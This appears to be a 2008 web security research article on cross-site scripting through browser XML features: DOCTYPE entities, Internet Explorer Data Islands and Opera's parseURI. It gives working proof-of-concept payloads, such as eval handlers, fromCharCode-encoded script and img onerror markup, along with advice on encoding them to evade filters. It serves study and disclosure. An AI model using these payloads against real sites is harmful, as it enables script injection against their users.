Intro
Since the browser that changed it all was released in early 1999, most of the major players in this field have been toying around with XML: processing, displaying and transforming it. As a result, most browsers know one or more ways to fetch data from other resources and to work with DTDs and entities. Some of them are shown and explained in this article.
Code
Firefox and all other major browsers except IE implement an XML feature called XXE - XML eXternal Entities. Securiteam wrote about this issue many years ago, and it has seen a kind of resurrection in the Google Caja Wiki. Basically, XXE means it's possible to define entities for complete strings and markup snippets in the DOCTYPE area of the document's header.
<!DOCTYPE xss [
  <!ENTITY x "<script>alert(this)</script>">
]>
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    &x;
  </head>
</html>
Unfortunately it doesn't seem to be possible to inherit the entities from the site itself into embedded frames or iframes. Otherwise it would have been possible to inject tons of script code with just a combination of &, some word characters and a semicolon.
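To make the mechanism more tangible, here is a minimal sketch of how an entity declared in the DOCTYPE ends up as markup in the document body. It is a deliberately simplified illustration and not how any browser's XML parser is actually implemented; the helper names collectEntities and expandEntities are made up for this example.

```javascript
// Simplified illustration only: a real XML parser handles far more
// (parameter entities, nested references, external entities, ...).

// Collect <!ENTITY name "value"> declarations from a DOCTYPE internal subset.
function collectEntities(source) {
  const entities = new Map();
  const declaration =
    /<!ENTITY\s+([A-Za-z_][\w.-]*)\s+(?:"([^"]*)"|'([^']*)')\s*>/g;
  let match;
  while ((match = declaration.exec(source)) !== null) {
    const value = match[2] !== undefined ? match[2] : match[3];
    // XML keeps the first declaration when a name is declared twice.
    if (!entities.has(match[1])) entities.set(match[1], value);
  }
  return entities;
}

// Replace each &name; reference with its declared value.
// Unknown references are left untouched.
function expandEntities(body, entities) {
  return body.replace(/&([A-Za-z_][\w.-]*);/g, (reference, name) =>
    entities.has(name) ? entities.get(name) : reference
  );
}

const doctype = '<!DOCTYPE xss [ <!ENTITY x "<script>alert(this)</script>"> ]>';
const body = '<head> &x; </head>';
const expanded = expandEntities(body, collectEntities(doctype));

console.log(expanded); // <head> <script>alert(this)</script> </head>
```

The four characters &x; in the body are enough to pull in the complete script element, which is what makes the technique interesting for injection.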
Internet Explorer makes up for its lack of XXE support with a feature called Data Islands. This allows adding an XML tag to the document that links to a resource containing valid XML. If the parser later finds certain attributes in the DOM (datasrc and datafld in the examples here), the data from the XML is checked for a match and, if everything fits, applied to the markup.
There are some basic security rules that forbid applying data from the XML file to a script tag, and that escape certain special characters before they are placed in the DOM - but these can easily be circumvented.
<html>
  <body>
    <xml id="xss" src="island.xml"></xml>
    <label onmouseover=eval(this.innerHTML) style=color:#fff;display:block;width:100%;height:100% datasrc=#xss datafld=payload></label>
  </body>
</html>
Here we can see the corresponding XML data with embedded JavaScript code. Surprisingly, this time IE had problems parsing the data when it was encoded as UTF-7 - we only managed to get the script code executed in combination with ISO or UTF-8 encoding.
<?xml version="1.0"?>
<x>
  <payload>
    document.write(
      String.fromCharCode(
        60,105,109,103,32,115,114,99,61,120,32,111,110,
        101,114,114,111,114,61,97,108,101,114,116,40,34,
        88,83,83,34,41,62
      )
    )
  </payload>
</x>
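The character codes in the payload are easier to follow once decoded. The short sketch below turns them back into a string and shows the reverse direction as well; the helper name toCharCodes is introduced only for this illustration.

```javascript
// The character codes from the payload element above.
const codes = [
  60, 105, 109, 103, 32, 115, 114, 99, 61, 120, 32, 111, 110,
  101, 114, 114, 111, 114, 61, 97, 108, 101, 114, 116, 40, 34,
  88, 83, 83, 34, 41, 62
];

// String.fromCharCode turns UTF-16 code units back into a string.
const decoded = String.fromCharCode(...codes);
console.log(decoded); // <img src=x onerror=alert("XSS")>

// Reverse direction: turn arbitrary markup into a list of character codes.
function toCharCodes(text) {
  return text.split('').map((character) => character.charCodeAt(0));
}

console.log(toCharCodes('<img>').join(',')); // 60,105,109,103,62
```

Written this way, the payload contains no angle brackets or quotes, so nothing is left for the escaping of special characters mentioned above to act on.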
When using the dataformatas attribute it's even possible to have the incoming XML data treated as HTML. IE8 won't allow script tags but can be tricked into executing JavaScript code via an img tag and its error handler. Here's the markup:
<html>
  <body>
    <xml id="xss" src="island.xml"></xml>
    <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
  </body>
</html>
And the corresponding Data Island code:
<?xml version="1.0"?>
<x>
  <payload>
    <![CDATA[<img src=x onerror=alert(top)>>]]>
  </payload>
</x>
Opera knows XXE, as do Safari and Chrome - but of course no Data Islands. Opera also features another way of fetching XML content into the DOM, though. The function is called parseURI and is a method of the LSParser interface; a parser instance is created via the document.implementation object. All those features are documented in the DOM Level 3 Load and Save specs.
<script>
  var parser = document.implementation.createLSParser(1, null);
  var mdlfile = parser.parseURI('data:;,<x>document.write(String.fromCharCode(88,83,83))</x>');
  eval(mdlfile.documentElement.text);
</script>
The method can access neither off-domain resources nor the file system, nor opera: or javascript: URIs. But data: URIs are allowed, and thus the content of the string to parse can be chosen quite arbitrarily. Of course this time one can go all the way and encode the string as UTF-7, base64 or whatever is necessary.
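As a rough sketch of the base64 variant, the following snippet wraps the XML from the example above in a base64-encoded data: URI and decodes it again. It assumes Node.js (it relies on Buffer) and only demonstrates the encoding step; the helper names and the text/xml media type are choices made for this illustration, and it was not verified here against Opera's parseURI.

```javascript
// Build a data: URI whose content is base64-encoded (Node.js Buffer API).
function toBase64DataUri(content, mediaType = 'text/xml') {
  const encoded = Buffer.from(content, 'utf8').toString('base64');
  return `data:${mediaType};base64,${encoded}`;
}

// Recover the original content from such a URI.
function fromBase64DataUri(uri) {
  const marker = ';base64,';
  const index = uri.indexOf(marker);
  if (!uri.startsWith('data:') || index === -1) {
    throw new Error('not a base64 data: URI');
  }
  const encoded = uri.slice(index + marker.length);
  return Buffer.from(encoded, 'base64').toString('utf8');
}

const xml = '<x>document.write(String.fromCharCode(88,83,83))</x>';
const uri = toBase64DataUri(xml);

console.log(uri);
console.log(fromBase64DataUri(uri) === xml); // true
```

After the data:text/xml;base64, prefix, the URI consists only of base64 characters, so no angle brackets or parentheses remain visible to a filter looking for markup or script code.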
Conclusion
One might wonder why browser vendors are each brewing their own sub-standards and XML soups. Every solution has its flaws, but none besides Opera allows including data which is not located on the same domain. Once parseURI can be executed in combination with a data: URI the possibilities are endless - and it's very hard to determine the origin and content of the payload. For all other described variants one has to have at least an XML file lying around on the same domain.
It's 2008 right now and browser vendors seem to have learned what the cross-domain border is. None of the techniques was able to download content from off-domain resources - except for the data: URI issue with parseURI in Opera. Opera, by the way, features a lot more methods and properties inside the document.implementation object, which we will shed more light on in later articles.